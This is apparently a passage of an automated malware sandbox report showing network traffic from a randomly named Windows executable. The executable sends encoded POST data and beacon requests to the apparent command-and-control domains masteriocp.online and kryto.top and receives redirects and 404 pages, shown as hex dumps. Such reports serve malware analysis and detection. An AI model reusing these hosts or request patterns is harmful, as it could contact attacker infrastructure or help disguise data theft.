                        Data Ascii: lt=8AsyGU9UOuOI9GvM2zG1lXtnqZ6vmZagLVzphVTfL8Y0sbCOKwdray6yQhxtduBZ3nJpd27iM5Ddjfn7IWomGdh7f992IYg0AVv3PZpqzTzvIchd5kxovZlU8epJ79fekP885qkTxjfuPjzVnuLO4B/culPYMxCiVUKYV0FsMgYfSB61e8NVNST2MBQAtEH2We6HoWOIGXlxMfmCNtueAu4=
                        Sep 9, 2024 04:52:27.486562967 CEST368INHTTP/1.1 301 Moved Permanently
                        Server: openresty
                        Date: Mon, 09 Sep 2024 02:52:27 GMT
                        Content-Type: text/html
                        Content-Length: 166
                        Connection: close
                        Location: https://www.masteriocp.online/wg84/
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        11192.168.2.44975354.179.173.60802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:52:29.091778040 CEST10879OUTPOST /wg84/ HTTP/1.1
                        Host: www.masteriocp.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.masteriocp.online
                        Referer: http://www.masteriocp.online/wg84/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 38 41 73 79 47 55 39 55 4f 75 4f 49 39 47 76 4d 32 7a 47 31 6c 58 74 6e 71 5a 36 76 6d 5a 61 67 4c 56 7a 70 68 56 54 66 4c 38 67 30 74 75 57 4f 4c 54 31 72 62 79 36 79 5a 42 78 6f 64 75 41 62 33 6e 52 74 64 32 32 58 4d 37 4c 64 79 4d 66 37 4a 6e 6f 6d 4a 64 68 37 41 74 39 37 46 34 68 70 41 56 2f 7a 50 5a 35 71 7a 54 7a 76 49 65 35 64 77 56 78 6f 70 5a 6c 54 72 75 70 46 71 4e 66 32 6b 50 31 4c 35 70 49 74 78 58 72 75 50 44 44 56 6c 38 54 4f 69 42 2f 65 74 6c 50 51 4d 78 2f 38 56 58 75 36 56 77 4e 57 4d 6e 77 66 66 56 37 68 5a 66 38 50 4f 42 6a 43 52 78 4d 2b 68 55 66 4f 54 2b 79 5a 73 32 2b 76 65 45 70 52 4d 63 72 74 61 4e 47 53 58 59 34 76 75 4b 6e 4c 36 72 69 68 4b 31 50 46 6e 4d 47 4c 6f 6f 43 62 35 64 74 35 68 4e 47 6c 50 4f 67 39 70 50 4e 6e 72 32 47 34 6f 4e 6b 42 46 58 31 6a 4c 78 35 4b 51 4b 63 62 59 64 7a 51 6e 79 66 77 53 35 31 67 56 52 56 47 57 38 4f 31 44 50 33 77 79 50 67 37 4e 76 58 75 31 61 6c 4a 4b 6e 4c 78 32 71 49 48 78 43 4a 57 4b 4e 45 70 79 6e 49 53 2f 43 35 6c 4f 46 55 [TRUNCATED]
                        Data Ascii: lt=8AsyGU9UOuOI9GvM2zG1lXtnqZ6vmZagLVzphVTfL8g0tuWOLT1rby6yZBxoduAb3nRtd22XM7LdyMf7JnomJdh7At97F4hpAV/zPZ5qzTzvIe5dwVxopZlTrupFqNf2kP1L5pItxXruPDDVl8TOiB/etlPQMx/8VXu6VwNWMnwffV7hZf8POBjCRxM+hUfOT+yZs2+veEpRMcrtaNGSXY4vuKnL6rihK1PFnMGLooCb5dt5hNGlPOg9pPNnr2G4oNkBFX1jLx5KQKcbYdzQnyfwS51gVRVGW8O1DP3wyPg7NvXu1alJKnLx2qIHxCJWKNEpynIS/C5lOFUnHxh+qW5pf7cisHwW264j+0GhsUubZHYYcrjh4tKkm2pxbtrBG46NJu0nHF6Xu39Cn7GSv6PtoR6+C5Yxrrx/eEqMJDFXWWH4IwD5klO/i4Yt5IX3bMZHQw+B6buLZpPUFpk+RQblg3Fr7EmRAWNdRWCwxmTYVM4TldaC51dUn4O63ay48Bl8mFfQk1iaXGAggPqX1kvm25ZhyXoB/TdBU/r7CCJDdBD2Z7w9hq9xfIoZ6NaoW92ZsHB+NQY5n+m6IAAD6PdY+U7QpzJivS+yCDBz5psm3xmmVQcFFkVrqn2ueLZKAlhXyeXs2auYHs9M8VJhfR8iSyPN7BKAbZfclPGrdIZhR3dawdYSU8wEzCjKucwH4iWGNtc3olaKgxpIllPUaHHCpamtIGYe44FLsCzlDeselIp8L2QOa/xlOTamqIjOdET+j9PmSd/GlF8yrGG0pOtCfpSz+M4w2OJB0Vi9+0oIZ1GZNSyaDsIzrDqHsgMsc4I4MKWDU7wp8Gpilk49EAX+06k4qqPwulaEw+nmW+Np+zmHeUflLukCnfuO1sdYMnTHvM0x6/6Arp0O7T7XqCNIDE74JMsGZU4YndEWUr82ONwuUPlSJEinzAgaQQfJo3zxihk5N2tmnyZ+UvNTlLJddMoUCfi4gvMGLecMp/zv+va2y [TRUNCATED]
                        Sep 9, 2024 04:52:30.018930912 CEST368INHTTP/1.1 301 Moved Permanently
                        Server: openresty
                        Date: Mon, 09 Sep 2024 02:52:29 GMT
                        Content-Type: text/html
                        Content-Length: 166
                        Connection: close
                        Location: https://www.masteriocp.online/wg84/
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        12192.168.2.44975454.179.173.60802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:52:31.632414103 CEST498OUTGET /wg84/?3ry=nj20Xr&lt=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiIMBWOeQzOKw0PF/QCepN6DzDO5x86004gqo= HTTP/1.1
                        Host: www.masteriocp.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:52:32.576193094 CEST503INHTTP/1.1 301 Moved Permanently
                        Server: openresty
                        Date: Mon, 09 Sep 2024 02:52:32 GMT
                        Content-Type: text/html
                        Content-Length: 166
                        Connection: close
                        Location: https://www.masteriocp.online/wg84/?3ry=nj20Xr&lt=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiIMBWOeQzOKw0PF/QCepN6DzDO5x86004gqo=
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        13192.168.2.449755162.0.213.94802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:52:37.976773024 CEST753OUTPOST /09dt/ HTTP/1.1
                        Host: www.kryto.top
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.kryto.top
                        Referer: http://www.kryto.top/09dt/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 6d 5a 33 6d 36 51 61 33 5a 59 2f 32 46 53 57 4c 52 50 70 43 42 56 72 4a 36 77 68 6e 38 35 43 7a 56 67 49 6a 63 51 6d 41 36 41 49 42 70 4c 41 7a 42 64 30 38 79 55 6e 56 58 67 58 73 41 30 59 46 30 74 64 74 7a 75 6c 6e 53 4c 69 33 4b 79 55 38 35 47 5a 47 54 5a 63 66 79 5a 55 50 71 41 34 4c 43 43 4b 6f 77 70 34 33 75 6a 7a 4a 2b 62 78 6d 79 31 4f 43 57 2f 37 49 34 6d 53 57 57 36 61 4d 49 43 47 37 6d 6f 39 4f 44 45 44 6f 6b 32 48 38 4c 46 6f 32 62 54 37 6f 56 43 31 58 69 31 47 58 61 36 6c 66 74 51 46 75 52 56 52 37 45 79 34 66 57 31 78 4c 56 49 44 53 50 6e 38 53 56 73 4f 62 33 41 3d 3d
                        Data Ascii: lt=mZ3m6Qa3ZY/2FSWLRPpCBVrJ6whn85CzVgIjcQmA6AIBpLAzBd08yUnVXgXsA0YF0tdtzulnSLi3KyU85GZGTZcfyZUPqA4LCCKowp43ujzJ+bxmy1OCW/7I4mSWW6aMICG7mo9ODEDok2H8LFo2bT7oVC1Xi1GXa6lftQFuRVR7Ey4fW1xLVIDSPn8SVsOb3A==
                        Sep 9, 2024 04:52:38.628638029 CEST1236INHTTP/1.1 404 Not Found
                        Date: Mon, 09 Sep 2024 02:52:38 GMT
                        Server: Apache
                        Content-Length: 16052
                        Connection: close
                        Content-Type: text/html
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                        Sep 9, 2024 04:52:38.628658056 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                        Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                        Sep 9, 2024 04:52:38.628669024 CEST448INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                        Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                        Sep 9, 2024 04:52:38.628680944 CEST1236INData Raw: 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31 30 33 2c 31 2e 35 30 33 36 35 20 2d 31 2e 36
                        Data Ascii: 68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,-0.76581 4.0014
                        Sep 9, 2024 04:52:38.628691912 CEST1236INData Raw: 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39 37 31 20 2d 34 2e 37 35 30 33 31 35 2c 31 31
                        Data Ascii: 49655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,5
                        Sep 9, 2024 04:52:38.628703117 CEST1236INData Raw: 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e 37 34 39 39 36 2c 31 32 2e 34 39 39 39 35 20
                        Data Ascii: 786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.4206
                        Sep 9, 2024 04:52:38.628714085 CEST1236INData Raw: 33 2c 32 33 2e 38 30 36 34 37 20 2d 30 2e 35 33 30 33 34 2c 31 34 2e 31 34 33 33 38 20 2d 32 2e 38 38 37 30 36 2c 33 36 2e 35 33 32 32 36 20 2d 35 2e 34 32 30 39 2c 35 36 2e 34 34 39 35 31 20 2d 32 2e 35 33 33 38 33 2c 31 39 2e 39 31 37 32 35 20
                        Data Ascii: 3,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44951 -2.53383,19.91725 -5.24428,37.35836 -7.95503,54.80146" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;strok
                        Sep 9, 2024 04:52:38.628727913 CEST896INData Raw: 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22
                        Data Ascii: butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.12978,122.92016 c -2.601311,10.56131 -5.214983,21.17282 -7.40283,31.41665 -2.187847,10.24384 -3.955407,20.14218 -5.074975,26.03483
                        Sep 9, 2024 04:52:38.628851891 CEST1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                        Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                        Sep 9, 2024 04:52:38.628864050 CEST224INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                        Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"
                        Sep 9, 2024 04:52:38.633610010 CEST1236INData Raw: 20 20 20 20 20 20 20 20 72 78 3d 22 32 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 79 3d 22 32 33 38 2e 30 38 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 31 39 2e 31 32 32 36 32 22 0a 20 20 20 20 20 20 20 20 20
                        Data Ascii: rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterl


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        14192.168.2.449756162.0.213.94802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:52:40.523871899 CEST773OUTPOST /09dt/ HTTP/1.1
                        Host: www.kryto.top
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.kryto.top
                        Referer: http://www.kryto.top/09dt/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 6d 5a 33 6d 36 51 61 33 5a 59 2f 32 48 79 47 4c 65 49 31 43 51 6c 72 47 30 51 68 6e 70 70 43 33 56 67 30 6a 63 55 2b 51 36 79 38 42 6e 4a 49 7a 41 63 30 38 31 55 6e 56 64 41 57 6d 64 45 59 53 30 73 68 54 7a 73 78 6e 53 49 65 33 4b 32 51 38 35 78 4e 48 54 4a 63 64 36 35 55 4a 75 41 34 4c 43 43 4b 6f 77 70 39 71 75 69 62 4a 2b 72 42 6d 67 41 36 42 59 66 37 58 73 32 53 57 64 61 61 41 49 43 47 5a 6d 70 68 6b 44 48 72 6f 6b 7a 44 38 50 45 6f 31 51 54 37 79 59 69 31 44 75 58 53 61 66 4c 5a 51 6c 44 74 41 50 6c 52 6f 4d 55 70 46 48 45 51 63 48 49 6e 68 53 67 31 6d 59 76 7a 53 73 41 50 62 55 56 72 32 36 6d 79 73 53 41 36 53 72 59 42 46 51 6f 73 3d
                        Data Ascii: lt=mZ3m6Qa3ZY/2HyGLeI1CQlrG0QhnppC3Vg0jcU+Q6y8BnJIzAc081UnVdAWmdEYS0shTzsxnSIe3K2Q85xNHTJcd65UJuA4LCCKowp9quibJ+rBmgA6BYf7Xs2SWdaaAICGZmphkDHrokzD8PEo1QT7yYi1DuXSafLZQlDtAPlRoMUpFHEQcHInhSg1mYvzSsAPbUVr26mysSA6SrYBFQos=
                        Sep 9, 2024 04:52:41.191790104 CEST1236INHTTP/1.1 404 Not Found
                        Date: Mon, 09 Sep 2024 02:52:41 GMT
                        Server: Apache
                        Content-Length: 16052
                        Connection: close
                        Content-Type: text/html
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                        Sep 9, 2024 04:52:41.191812038 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                        Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                        Sep 9, 2024 04:52:41.191823006 CEST1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                        Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                        Sep 9, 2024 04:52:41.191840887 CEST1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                        Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                        Sep 9, 2024 04:52:41.191854000 CEST896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                        Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
